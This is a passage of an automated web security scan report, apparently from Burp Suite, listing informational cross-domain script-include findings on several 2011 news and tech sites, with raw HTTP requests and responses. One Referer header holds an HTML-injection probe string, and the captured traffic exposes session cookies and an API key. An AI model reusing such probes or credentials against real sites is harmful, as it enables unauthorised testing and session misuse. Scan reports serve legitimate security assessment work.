Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211547%26CFTOKEN%23%3D84610132%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23hitcount%3D2%23cftoken%3D84610132%23cfid%3D155211547%23;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 70039
Date: Sat, 29 Jan 2011 22:32:21 GMT
X-Varnish: 461255158
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
   <!--[if IE]><![endif]-->
   <title>Observations: Scientific American Blogs</title>
   <meta charset="utf-8" />
   <meta name="description" content="" />
   <met
...[SNIP]...
<!-- By use of this code snippet, I agree to the Brightcove Publisher T and C found at http://corp.brightcove.com/legal/terms_publisher.cfm. --> <script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script> <script src="http://admin.brightcove.com/js/APIModules_all.js"></script>
...[SNIP]...
</h3>
       <script src="http://bit.ly/javascript-api.js?version=1.02&amp;login=sciam&amp;apiKey=R_4f0af26579dbeb7e65abbf25664a9b49&amp;history=1"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.579. http://www.scientificamerican.com/errors/404.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scientificamerican.com
Path:   /errors/404.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /errors/404.cfm HTTP/1.1
Host: www.scientificamerican.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSCIAMUSER=; CFID=155211566; CFTOKEN=70876219; CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D2%23cftoken%3D70876219%23cfid%3D155211566%23; OAX=rcHW801FnIUACoU2

Response

HTTP/1.1 404 Page not found
Server: Apache
Set-Cookie: CFID=155211566;path=/
Set-Cookie: CFTOKEN=70876219;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D30%2012%3A14%3A49%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D3%23cftoken%3D70876219%23cfid%3D155211566%23;expires=Tue, 22-Jan-2041 17:14:49 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 57499
Date: Sun, 30 Jan 2011 17:14:49 GMT
X-Varnish: 1916371499
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
   <!--[if IE]><![endif]-->
   <title>Page not found--/errors/404.cfm? : Scientific American</title>
   <meta charset="utf-8" />
   <meta name="description" conte
...[SNIP]...
</h3>
       <script src="http://bit.ly/javascript-api.js?version=1.02&amp;login=sciam&amp;apiKey=R_4f0af26579dbeb7e65abbf25664a9b49&amp;history=1"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.580. http://www.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:25:49 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:35:49 GMT
Last-Modified: Sat, 29 Jan 2011 23:54:38 GMT
ETag: "1CBC00FE3423300"
Content-Type: text/html
Content-Length: 99726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com - College and High School Football, Basketball, Recruiti
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...
<!-- BEGIN WEBSITEGEAR.COM COMPACT POLL CODE -->
<script type="text/javascript" src="http://poll.websitegear.com/compactpoll.asp?pollID=18182"></script>
...[SNIP]...

23.581. http://www.scout.com/3/college-links.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/college-links.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/college-links.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:00 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12628

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com</title>
<meta http-equiv="Content-Type" co
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.582. http://www.scout.com/3/company.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/company.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/company.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:50 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14472

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Company Overview</title>
<meta http-equiv
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.583. http://www.scout.com/3/fair-use.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/fair-use.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/fair-use.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:39 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13618

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Fair Use</title>
<meta http-equiv="Conten
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.584. http://www.scout.com/3/jobs.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/jobs.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/jobs.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:51 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 18927

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Jobs at Scout.com</title>
<meta http-equi
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.585. http://www.scout.com/3/privacy-policy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/privacy-policy.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/privacy-policy.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:24 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36135

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Privacy Policy</title>
<meta http-equiv="
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.586. http://www.scout.com/3/recruiting-links.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/recruiting-links.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/recruiting-links.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:02 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:02 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12567

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com</title>
<meta http-equiv="Content-Type" co
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.587. http://www.scout.com/3/security-information.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/security-information.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/security-information.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:50 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13553

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Security Information</title>
<meta http-e
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.588. http://www.scout.com/3/terms-of-service.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/terms-of-service.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/terms-of-service.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:00 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 53554

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Terms of Service</title>
<meta http-equiv
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.589. http://www.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /a.z HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 30 Jan 2011 01:27:22 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:22 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.590. http://www.scout.com/search.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /search.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search.aspx?s=143 HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:31 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14267

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Search</title>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.591. http://www.scout.com/widgets/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /widgets/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /widgets/ HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:27 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:27 GMT
Last-Modified: Fri, 28 Jan 2011 00:49:27 GMT
ETag: "1CBBE8536D44580"
Content-Type: text/html
Content-Length: 14619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.592. http://www.signonsandiego.com/news/blogs/science-quest/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.signonsandiego.com
Path:   /news/blogs/science-quest/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/blogs/science-quest/ HTTP/1.1
Host: www.signonsandiego.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Sun, 30 Jan 2011 03:20:02 GMT
ETag: "9c8550eb7d3bb13cfe45503c097b5a84"
Cache-Control: max-age=60
Last-Modified: Sun, 30 Jan 2011 03:19:02 GMT
Content-Type: text/html; charset=utf-8
Server: Apache/2.2.10
Content-Length: 111080
Date: Sun, 30 Jan 2011 03:19:02 GMT
X-Varnish: 1618713280
Age: 0
Via: 1.1 varnish
Connection: close

<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<meta name="verify-v1" content="6ylWgY9aqB0mJpcLJKDC73
...[SNIP]...
</style>

   
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
<script type="text/javascript" src="http://js.zvents.com/javascripts/happy_partner_widgets.js"></script>
...[SNIP]...
</a>
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div class="marB10">
<script src="http://www.stumbleupon.com/hostedbadge.php?s=1"></script>
...[SNIP]...
<div class="marB10">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text-votes">ARTICLEURL</script>
...[SNIP]...
<!-- Begin of webcam code -->
<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2/swfobject.js"
type="text/javascript">
</script>
...[SNIP]...
</h4>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="thingstodo_widget">
<script type="text/javascript" src="http://js.zvents.com/javascripts/partner_widgets/ZventsEventListLayout1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

23.593. http://www.silverlight.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:14:45 GMT
Content-Length: 43537


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Home : The
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.594. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/devices/windows-phone/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/devices/windows-phone/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:26 GMT
Content-Length: 531


<html><head></head><body><body bgcolor="#FFFFFF"><!-- begin ZEDO for channel: Neudesic , publisher: Neudesic , Ad Dimension: Super Banner - 728 x 90 -->
<script language="JavaScript">
var zflag_ni
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

23.595. http://www.silverlight.net/community/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /community/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 76927
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.596. http://www.silverlight.net/community/blogarchive/silverlight/1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /community/blogarchive/silverlight/1/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/blogarchive/silverlight/1/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24868
